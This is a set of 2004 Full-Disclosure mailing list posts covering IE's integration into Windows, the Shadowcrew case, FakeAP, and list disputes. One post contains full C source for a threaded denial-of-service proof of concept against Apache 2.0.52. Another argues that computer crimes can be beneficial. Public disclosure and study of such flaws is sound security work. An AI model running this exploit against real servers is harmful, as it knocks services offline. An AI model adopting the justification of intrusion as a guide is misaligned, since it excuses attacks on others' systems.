So are you saying you truly believe IE to be an integral part of the OS that without it the OS would not be useable or would fail entirely and believe MS implicitly or are you just trying to be a sassy PITA? -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller Sent: Tuesday, November 16, 2004 2:09 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal positiion. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
I would rather not get too deep into this. But I think you are mixing the ideas of good code with good documentation or possibly with good hard design specs. In any project there are going to be things that aren't specifically specified in the design that some other module could possibly take advantage of. These are generally considered implementation details. For a basic example, say you have a routine that takes a search filter and returns information based on that filter. Let's say when the spec was written, no thought of the ordering of the data to be returned was defined, it was simply a matter of return the correct data. Actually specifying the order possibly wasn't important or overlooked. Some very high quality code was written to the spec and the specific implementation detail ended up having it so the data got returned in a way that was sorted by some field used in the query or by some arbitrary value specific to the indexing. Someone completely unrelated to the module, say someone who is using that module as an API or as a server app notices that it always comes back sorted and implements some stateless retrieval mechanism around it (I understand, this is their F-U and they wrote bad code here because there are critical untested assumptions). This works for years and years. Then some work is done on the original code and that implementation detail changes and sort is now done in a different way or not at all. Downstream modules dependent on that until then well understood implementation detail implode. The original code was still high quality. Someone just used it in a way that wasn't intended. It is these unintended uses of implementation details that can really bite you and why YOU ALWAYS legacy test code that may be used by something else. I don't think any spec will ever define out 100% what needs to go in and what needs to come out and all of the possible implementation details that could result. I think we can get close and assert the crap out of the input and output based on what we expect and break out when it deviates. But this is an expensive form of coding and I think impacts flexibility a little. Anyway, on the flip side you could have horrible spaghetti code that conforms very well to a published spec as well. I would tend to agree that normally that would be harder to work on (except for maybe the person who originall wrote it) but want to put emphasis on the importance truly being in the spec and data assertions. I completely agree that IE is too intertwined and it gives the appearance that the OS needs it. It does need to be stripped back out or the piece that allegedly has to be there for OS functionality needs to be stripped down to very bare very basic pieces that disallows and extension or code execution. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Paynter Sent: Tuesday, November 16, 2004 4:19 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox But high quality code that has a sound and well documented architecture can be more easily updated without messing up dependencies, whereas low quality code can be a nightmare to find let alone correct even the most trivial bug. There are always exceptions, but *in general*, it is easier (less effort, faster turnaround) to maintain high quality code. -Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Airport x-ray software creating images of phantom weapons?
On Tue, 16 Nov 2004 05:08:48 GMT, Jason Coombs said: If quality is the true objective, then perhaps we should adopt exceptions to intellectual property laws to force into the public domain any creative work that has the capability to impact the security of anything important... A few minutes of careful thought and pondering over what security measures have been deployed and proposed will reveal the following: 1) Invisible effective measures don't do much good, because they don't sway votes. 2) Highly visible measures, even if ineffective, do good because they allow the projection of a We're doing something about it spin. Now, why do you think quality counts as an objective here? (Consider in your discussion the chances that the Department of Homeland Security will *ever* lower the Threat Level to 'green', and under what conditions that would happen, and what that would mean for the continued employment of the people responsible for lowering it to green) pgpeQs96EQyza.pgp Description: PGP signature
RE: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
Well as a security professional I can testify that the sites you want closed down ie reference to zone-h etc.. Are a valued source of knowledge! Obviously your not plugged into security and as such use these groups to talk Shi* and justify your views of closing IRC Channels. Thankfully your not in government and btw , not all readers on this list are in the US , I am from the UK and its clear to me that you don't understand the concept of freedom of information ! r -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Bruce Ediger Sent: 17 November 2004 20:29 To: [EMAIL PROTECTED] Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment On Wed, 17 Nov 2004, n3td3v wrote: ... If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tollerence with online crime. Govs should have the authority to close anything done because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, its time to get a tighter grip on things. ... Same for zone-h.org, close the crap down.. f**k anything that looks remotely hax0rish. Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that quaint (I believe that's what our new Attorney general calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13. xmlsSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights. Zero tollerence. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Ah thanks, that answers my question. :o) On the MS defender comment. Well I can't say much other than not everyone thinks that a company is entirely good or entirely bad. I have a more granular outlook on things. Some things are done well, some things aren't. That applies to all OSes. None of them do everything right. joe -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: Gary E. Miller [mailto:[EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 5:24 PM To: joe Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yo Jo! Who am I to tell Bill Gates he is a liar and a perjurer? He and his employees, under oath, said IE is an indivisible part of the OS. So it must be so. :-) I do not have an opinion since I gave up WinBlows years ago. Just seemed odd to me that an M$ defender would not be going with the party line and suggesting the IE is not part of the OS. Sorta thought that was obvious from the context which you deleted, but some people are clueless and can not be helped. RGDS GARY - --- Gary E. Miller Rellim 20340 Empire Blvd, Suite E-3, Bend, OR 97701 [EMAIL PROTECTED] Tel:+1(541)382-8588 Fax: +1(541)382-8676 On Wed, 17 Nov 2004, joe wrote: So are you saying you truly believe IE to be an integral part of the OS that without it the OS would not be useable or would fail entirely and believe MS implicitly or are you just trying to be a sassy PITA? -- Pro-Choice Let me choose if I even want a browser loaded thanks! -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gary E. Miller Sent: Tuesday, November 16, 2004 2:09 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox I suggest you re-read about the M$ anti-trust trial. This was certainly NOT the M$ legal positiion. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFBm8+I8KZibdeR3qURArLiAJ4lNKKb6vXfZk4ZpO0Ht1wo71XGOACg5Xqf mpQcKH20wry5bfQpubn2wvw= =NLch -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?
Hello list, Mission Impossible theme sounded weird (too weird) and so on... Tell me: why should these link be active after the UNITED STATES SECRET SERVICE Operation ? http://www.shadowcrew.com/phpBB2/login.php http://archive.shadowcrew.com/Archive/ Matteo Giannone Libero ADSL: navighi gratis a 1.2 Mega, senza canone e costi di attivazione. Abbonati subito su http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
Without web defacing teenagers this industry wouldn't have gained the momentum it has. Yin/Yang. Without your so called cybercriminals your life would be meaningless. /m Len rose is a muppet. Stop moderating my mail. - Original Message - From: n3td3v [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 3:19 PM Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment On Wed, 17 Nov 2004 13:29:19 -0700 (MST), Bruce Ediger [EMAIL PROTECTED] wrote: Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that quaint (I believe that's what our new Attorney general calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xml; sSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights. Zero tollerence. What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans. I don't live in the U.S thankfully, I live in a sane country called the U.K Would you agree with closing down a site that was letting child abusers to post links to illegal child porn photographs? Would the site owner be able to say, we aren't involved with any of these links, we just provide the site for the criminals to do it, so other child abusers can get links easy to child porn photos. But no, when we move onto online malicious hacker crimes, its ok for sites, such as zone-h, which allows malicious hackers to post links for other hackers to get a kick over, just like a child abuser would by visiting a child porn photo. Imagine a child abuse site which also kept a score board of the biggest amount of child porn photo posters. Yet again we move onto malicious hacker online crimes, it seems to be different for zone-h to keep scores of the biggest malicious hacker defacement posters. Why one rule for one online crime promotion site and not the same rule for another online crime promotion site? I guess you would allow a child porn promotion site, like you think its ok for zone-h to be online promoting online malicious hacking and not closed down. Thanks,n3td3v http://www.geocities.com/n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
What happened to the government can have my electronic speech when they pry it from my cold, dead fingers ? Many people fail to understand that incompetency knows no limits or bounds. It is alive and well in all human institutions and activities, and each one of us is in fact incompetent in any number of ways. Only knowledge and the ability to spot incompetency protect us from ourselves while simultaneously providing the only defense possible against all types of harm that result systemically from anything that one person can do or create that by design impacts other people. unimpeded freedom and full-disclosure serve the interests of the people by spreading that knowledge and ability. Crimes that result in awareness of other people's serious failures and incompetency, where such is actively harming others, serve a useful purpose for society. Computers could be said to be something of a crime against humanity to begin with. Crimes against computers pose an unusually complicated ethics puzzle, and at times are clearly beneficial to everyone. Regards, Jason Coombs ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: DoS in Apache 2.0.52 ?
Like Mauro, I also rewrote the exploit for Linux and couldn't get it to work at first. But I looked at it a little more and found it was because Gentoo already had it patched. It looks like most of the other vendors are also already on the ball with this one. So, as long as it works, here it is: apache-squ1rt.c: /* Apache Squ1rt, Denial of Service Proof of Concept Tested on Apache 2.0.52 [EMAIL PROTECTED] [EMAIL PROTECTED] Sends a request that starts with: GET / HTTP/1.0\n 8000 spaces \n 8000 spaces \n 8000 spaces \n ... 8000 times Apache never kills it. Takes up huge amounts of RAM which increase with each connection. Original credit goes to Chintan Trivedi on the FullDisclosure mailing list: http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html More info: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942 Versions between 2.0.35 and 2.0.52 may be vulnerable, but only down to 2.0.50 was tested. This attack may be preventable with a properly configured iptables ruleset. Gentoo already has a patch out in the 2.0.52-r1 release in the file 06_all_gentoo_protocol.patch v2 Rewritten to use pthread. gcc apache-squ1rt.c -lpthread */ #include stdio.h #include errno.h #include string.h #include stdlib.h #include unistd.h #include netdb.h #include sys/types.h #include sys/socket.h #include netinet/in.h #include arpa/inet.h #include pthread.h #define DEST_PORT 80 void *squirtIt(char *hName); char attackBuf[8000]; char letsGetStarted[128]; int main(int argc, char **argv){ int num_connect; int ret; pthread_t tid[35]; sprintf(letsGetStarted, GET / HTTP/1.0\n); memset(attackBuf, ' ', 8000); attackBuf[7998]='\n'; attackBuf[7999]='\0'; if (argc != 2){ fprintf(stderr, Usage: %s host name \n, argv[0]); exit(1); } for(num_connect = 0; num_connect 35; num_connect++){ ret = pthread_create(tid[num_connect], NULL, (void *)squirtIt, argv[1]); } /* assuming any of these threads actually terminate, this waits for all of them */ for(num_connect = 0; num_connect 35; num_connect++){ pthread_join(tid[num_connect], NULL); } return 0; } void *squirtIt(char *hName){ int sock, i; struct hostent *target; struct sockaddr_in addy; if((target = gethostbyname(hName)) == NULL){ herror(gethostbyname()); exit(1); } if((sock = socket(AF_INET, SOCK_STREAM, 0)) 0){ perror(socket()); exit(1); } addy.sin_family = AF_INET; addy.sin_port = htons(DEST_PORT); bcopy(target-h_addr, (char *)addy.sin_addr, target-h_length ); memset((addy.sin_zero), '\0', 8); if((connect(sock, (struct sockaddr*)addy, sizeof(addy))) 0){ perror(connect()); exit(1); } send(sock, letsGetStarted, strlen(letsGetStarted), 0); for(i=0; i 8000; i++){ send(sock, attackBuf, strlen(attackBuf), 0); } close(sock); } ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] I am out of here
You're right, in all that Dune of Sand, there really are some pearls, hard to find but they are there. Simon Barry Fitzgerald wrote: Berend-Jan Wever wrote: If you can't stand the heat, get out of the kitchen! And btw: if you're not cooking, get the fuck out too! Yeah - how hard is it to hit delete anyway? (I don't think I've ever joined a mailing list expecting every post to be interesting to me... nor even the majority. It seems like an unrealistic expectation.) -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] For your pleasure
oh? - 08/23/2001 05:00 AM 354,468 wmpaud1.wav ( bintext output ) 00056862 00056862 0 INFOICRD 0005686E 0005686E 0 2000-04-06 00056882 00056882 0 Deepz0ne 00056894 00056894 0 Sound Forge 4.5 - ..heh Guys, For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php I know, it is in French, but here is my translation, it deserves to be known. Digging into Windows XP Operating Systems, the journalists of PC Welt discovered the following text at the end of the files presents into the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory: [see the picture at the link] You have to know that DeepzOne is the nickname of a founding member of the Radium cracking group created in 1997 and especialized into the craking of sound oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the SoundForce program. Even if it is probable the Redmond giant has a license of this program (400$), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy... Laurent LEVIER Systems Networks Security Expert, CISSP CISM ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
I would have to agree with GuidoZ. The changing MAC would point to something being up. AP using different channels is pretty common in some models but the MAC changing and being different vendors points to fake AP. I bet you 10 bucks the WEP key changes on all but one of them each time too..lol -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of GuidoZ Sent: Wednesday, November 17, 2004 12:42 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question I'm not 100% on this, as it could be something I've never heard of (of course). However, it sounds a lot like someone is playing with FakeAP: - http://www.blackalchemy.to/project/fakeap/ It's not real difficult to setup and only requires a Prisim chipset card (one or more) and a compatible Linux distro. It's been around for over 2 years, but hasn't been touched for about the same amount of time. See the site for more. -- Peace. ~G On Wed, 17 Nov 2004 13:53:07 +, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html